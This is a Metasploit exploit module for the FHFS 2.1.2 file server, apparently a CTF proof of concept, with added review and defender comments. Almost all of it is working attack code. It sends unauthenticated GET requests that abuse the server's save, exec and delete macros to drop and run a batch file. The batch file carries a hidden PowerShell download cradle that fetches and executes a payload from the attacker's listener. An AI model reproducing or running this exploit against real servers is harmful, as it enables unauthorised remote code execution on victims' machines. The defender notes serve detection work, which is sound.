PoC exploit used by the Cult of the Glowing Rectangle at the 2015 DerbyCon CTF
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote
  # Metasploit module for FHFS 2.1.2.
  #
  # Flow (see `primer`): three GET requests use the server's URL macros —
  # `{.save|...}` writes a .bat file under C:\Windows\Temp, `{.exec|...}` runs
  # it, `{.delete|...}` removes it. The batch file holds a PowerShell download
  # cradle (see `psh_cmd`) that fetches the real payload from this module's
  # own HTTP listener (see `on_request_uri`).
  #
  # Mixins used: HttpClient supplies `send_request_raw`; HttpServer supplies
  # `get_uri`, `send_response`, the `primer` / `on_request_uri` hooks and the
  # `super` that `exploit` wraps; Powershell supplies `cmd_psh_payload` and
  # `generate_psh_command_line`.
  #
  # Defender notes (all from the request/response strings below): the server
  # banner matched in `check` is `FHFS - FTP/HTTP File Server - v<version>`,
  # the three request URIs carry the literal macro tokens `{.save|`, `{.exec|`
  # and `{.delete|` in the query string, and the executed command contains a
  # `net.webclient ... downloadstring` cradle — all of which are useful
  # signatures in HTTP access logs and PowerShell script-block logs.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  # FileDropper is not mixed in; cleanup of the dropped .bat is done explicitly
  # by the `{.delete|...}` request in `primer` instead.
  #include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # @param info [Hash] base info merged by `update_info`.
  def initialize(info={})
    super(update_info(info,
      'Name' => "FHFS - FTP/HTTP File Server 2.1.2",
      'Description' => %q{
FHFS FTP/HTTP File Server (FHFS) is vulnerable to a remote command execution attack.
The exec command allows for unauthenticated command execution on the host system.
However, testing idicated that it failed to process anything other than a base command.
This module combines the exec and save commands to achieve arbitrary code execution using
powershell. Note: due to the way the server processes commands, this module should spawn
two shells.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Naser Farhadi', # Original Exploit Author
          'Zach Grace @ztgrace', # metasploit author
          'Trenton Ivey @TrentonIvey', # metasploit author
        ],
      'References' =>
        [
          ['URL', 'https://www.exploit-db.com/exploits/37985/'],
          ['URL', 'https://warroom.securestate.com/index.php/tag/fhfs/'],
        ],
      # Bytes excluded from the encoded payload: CR, LF, NUL and space.
      'Payload' => { 'BadChars' => "\x0d\x0a\x00\x20" },
      # NOTE(review): 'Space' sits at the top level of the info hash rather than
      # inside 'Payload' where Metasploit reads the payload space limit — confirm
      # whether this value is honored at all.
      'Space' => 2014,
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', {} ],
        ],
      'Privileged' => true,
      # Aggressive: the module connects out to the target itself (the requests
      # in `primer`) rather than waiting for a client to visit the listener.
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => "Aug 27 2015",
      'DefaultTarget' => 0))

    register_options(
      [
        # NOTE(review): TARGETURI is registered but none of the methods below
        # reads it — `check` and `primer` hard-code their request paths.
        OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
        # Consumed in `exploit` as the Timeout around the HttpServer run.
        OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 30]),
      ], self.class)
  end

  # Fingerprints the target from its `Server` response header.
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner reports exactly
  #   "2.1.2", Safe for any other reported version.
  #
  # NOTE(review): when the response is missing or the banner does not match,
  # control falls off the `if` and the method returns nil instead of a
  # CheckCode; `Exploit::CheckCode::Unknown` would be the conventional result.
  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/'
    })

    if res && res.headers['Server'] && res.headers['Server'] =~ /FHFS - FTP\/HTTP File Server - v([\d.]+)/
      # $1 is the version capture of the regex on the line above.
      version = $1
      print_status("FHFS version: #{version}")
      # Exact string comparison; no ordering of versions is attempted.
      if version == "2.1.2"
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    end
  end

  # HttpServer hook: answers the download cradle's request with the encoded
  # payload wrapped as a PowerShell script.
  #
  # @param cli [Rex::Socket] client connection.
  # @param req [Rex::Proto::Http::Request] incoming request; only its uri is logged.
  def on_request_uri(cli, req)
    print_status("#{peer} - Payload request received: #{req.uri}")
    # remove_comspec / use_single_quotes shape the wrapper so it survives the
    # `{.save|...}` / `{.decodeuri|...}` macro path used in `primer`
    # (presumably — the exact reason is not stated in this file).
    data = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      remove_comspec: true,
      use_single_quotes: true
    )
    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
  end

  # Builds the one-line PowerShell command that is written into the .bat file:
  # an `IEX` download cradle pointing at this module's listener (`get_uri`),
  # prefixed with the ignore-SSL-certificate snippet when SSL is enabled.
  #
  # @return [String] the complete powershell.exe command line
  #   (-noprofile, hidden window).
  def psh_cmd
    # Only set when `ssl` is true; otherwise interpolates as an empty string.
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
    download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
    cmd = generate_psh_command_line(
      noprofile: true,
      windowstyle: 'hidden',
      command: download_and_run
    )
    print_status("Command to execute: #{cmd}")
    return cmd
  end

  # HttpServer hook, run once the listener is up: sends the three macro
  # requests (save, exec, delete) to the target.
  #
  # Side effects on the target: a .bat file with a random 10-letter name is
  # created under C:\Windows\Temp, executed, then deleted.
  def primer
    file_name = rand_text_alpha(10)
    file_name << ".bat"
    batch_path = "C:\\Windows\\Temp\\#{file_name}"
    cmd = psh_cmd
    # NOTE(review): URI::escape was deprecated in Ruby 2.7 and removed in 3.0;
    # on a current Ruby this line raises NoMethodError.
    payloads = [
      "/?{.save|#{batch_path}|{.decodeuri|#{URI::escape(cmd)}.}.}", # dropper
      "/?{.exec|#{batch_path}.}", # command execution
      "/?{.delete|#{batch_path}.}",
    ]

    payloads.each do |payload|
      if datastore['VERBOSE']
        print_status("Sending payload: #{payload}")
      end
      # Per-request socket timeout of 20 s; the response is not inspected.
      send_request_raw({
        'method' => 'GET',
        'uri' => payload,
        'timeout' => 20,
      })
      # Fixed pause between macro requests — presumably to let the server
      # finish the previous step (e.g. writing the file) before the next one.
      sleep 2
    end
  end

  # Runs the HttpServer mixin's `exploit` (which starts the listener and
  # triggers `primer`) but stops it after HTTPDELAY seconds.
  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
      # Deliberately swallowed: the timeout is the normal way the listener ends.
    end
  end
end